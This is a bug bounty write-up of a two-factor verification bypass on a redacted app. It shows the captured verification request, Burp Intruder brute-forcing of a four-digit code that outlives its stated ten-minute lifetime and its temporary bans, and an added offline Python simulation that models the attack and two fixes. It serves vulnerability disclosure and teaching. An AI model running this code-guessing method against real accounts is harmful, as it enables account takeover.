Second Factor Authentication (2FA) Bypass in Private BBP

6 months ago

Steps:

1. Create an account with an email address; I used free@Palestine.com.

2. The app sends a verification code to free@Palestine.com and redirects you to https://app.Redacted.com/register/code-verification

[Screenshot: the verification message in the mailbox]

3. Enter any random code; I used 5555.

4. Enable an HTTP interception proxy such as Burp Suite or OWASP ZAP and capture the code-verification request.

Request:

POST /api/auth/resolve-email-verification-code HTTP/2
Host: app.Redacted.com
Cookie: [Redacted]
Content-Length: 38
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Pragma: no-cache
Sec-Ch-Ua-Mobile: ?0
X-Site-Context: [Redacted]
User-Agent: [Redacted]
Content-Type: application/json
Accept: application/json, text/plain, */*
X-Client-Data: [Redacted]
Sec-Ch-Ua-Platform: "Linux"
Origin: [Redacted]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: [Redacted]
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

{"email":"free@Palestine.com","code":5555}

5. Send the request to Burp Intruder, mark the value of the code field as the payload position, and use a numeric payload running from 0000 to 9999. Note that the captured request sends the code as a bare JSON number, so candidates with leading zeros (0001, 0012, ...) only reach the server intact if the field is sent as a string or the server's parser tolerates the non-standard number; check this before trusting a negative result.

[Screenshot: Burp Intruder attack]

6. After a few minutes the attack hit the valid code, 6712, and the login succeeded.

The same vulnerability also affected another endpoint, https://app.Redacted.com/login/code-verification, which likewise allows bypassing two-factor authentication.

This works for two reasons. First, although there is a temporary ban (rate limit) on verification attempts, the code stays valid for far longer than the stated 10 minutes, so an attacker can simply wait out each ban and keep guessing until the 10,000-candidate space is exhausted. Second, the code is only four digits; a secure design requires six or more digits, or a mix of letters and digits, and invalidates the code after a small number of failed attempts rather than only pausing the client.
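As an added example, not part of the original writeup, the following Python script simulates the attack offline: a fake server stands in for the verification endpoint of https://app.Redacted.com, with a temporary ban after too many failures, and the brute forcer replays the Intruder attack, waiting out each ban. Running the same attack against the two fixes described above (a real 10-minute lifetime, and a six-digit code that is invalidated after a handful of failures) shows why each one stops it. The class and function names (Clock, VerificationServer, brute_force, run_scenario) and all timing values are assumptions for illustration, not measurements of the target.

```python
"""Offline simulation of the 4-digit verification-code brute force.

Added example, not code from the original post. A fake server stands in
for https://app.Redacted.com so the script runs without network access;
every timing value (attempts per ban window, ban length, code lifetime,
request latency) is an assumption chosen for illustration.
"""
import math
from dataclasses import dataclass
from typing import Optional


class Clock:
    """Simulated wall clock, in seconds, shared by server and attacker."""

    def __init__(self) -> None:
        self.now = 0.0

    def sleep(self, seconds: float) -> None:
        self.now += seconds


@dataclass
class VerificationServer:
    """Stand-in for POST /api/auth/resolve-email-verification-code."""

    clock: Clock
    code_ttl: float = 24 * 3600        # assumed: far longer than the stated 10 minutes
    max_attempts: int = 20             # assumed: failures allowed before a temporary ban
    ban_seconds: float = 30.0          # assumed: length of the temporary ban
    invalidate_on_limit: bool = False  # hardened mode: kill the code instead of a timed ban
    _code: Optional[str] = None
    _issued_at: float = 0.0
    _failures: int = 0
    _banned_until: float = 0.0
    requests_seen: int = 0

    def issue_code(self, code: str) -> None:
        """The 'send verification code' step; the attacker never sees the code."""
        self._code = code
        self._issued_at = self.clock.now
        self._failures = 0
        self._banned_until = 0.0

    def verify(self, email: str, code: str) -> dict:
        """Returns a JSON-like body; 'status' mirrors the HTTP status code."""
        self.requests_seen += 1
        now = self.clock.now
        if now < self._banned_until:
            # Integer Retry-After, as real servers send it.
            return {"status": 429, "retry_after": math.ceil(self._banned_until - now)}
        if self._code is None or now - self._issued_at > self.code_ttl:
            return {"status": 410, "error": "code_expired"}
        if code == self._code:
            self._code = None  # single use
            return {"status": 200, "email": email}
        self._failures += 1
        if self._failures >= self.max_attempts:
            self._failures = 0
            if self.invalidate_on_limit:
                self._code = None
            else:
                self._banned_until = now + self.ban_seconds
        return {"status": 400, "error": "invalid_code"}


def brute_force(server: VerificationServer, email: str, digits: int = 4,
                request_latency: float = 0.1) -> Optional[str]:
    """Replays what Burp Intruder did: every zero-padded candidate in order.

    Candidates are sent as strings so that 0012 is tried as "0012"; the
    captured request sends a bare JSON number, which cannot carry leading zeros.
    """
    for n in range(10 ** digits):
        candidate = f"{n:0{digits}d}"
        while True:
            resp = server.verify(email, candidate)
            server.clock.sleep(request_latency)
            if resp["status"] != 429:
                break
            # Temporary ban: wait it out, then retry the same candidate.
            server.clock.sleep(resp["retry_after"])
        if resp["status"] == 200:
            return candidate
        if resp["status"] == 410:
            return None  # code expired or invalidated: the brute force fails
    return None


def run_scenario(code: str, **server_kwargs) -> dict:
    """Issue `code`, run the brute force, report outcome, request count and elapsed time."""
    clock = Clock()
    server = VerificationServer(clock, **server_kwargs)
    server.issue_code(code)
    found = brute_force(server, "free@Palestine.com", digits=len(code))
    return {"found": found, "requests": server.requests_seen, "elapsed_s": round(clock.now, 1)}


if __name__ == "__main__":
    # As in the writeup: 4 digits, timed ban only, the code outlives every ban.
    print("vulnerable:", run_scenario("6712"))
    # Fix A: actually enforce the 10-minute lifetime.
    print("10-minute TTL:", run_scenario("6712", code_ttl=600))
    # Fix B: 6 digits, and the code is invalidated after a burst of failures.
    print("hardened:", run_scenario("471902", invalidate_on_limit=True, max_attempts=5))
```

With the assumed limits the vulnerable scenario finds 6712 after about 7,000 requests and roughly three simulated hours of mostly waiting, which a 24-hour code lifetime happily accommodates; a genuine 10-minute lifetime ends the attack long before the space is covered, and invalidating the code after a few failures ends it after six requests regardless of how long the code would otherwise live.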
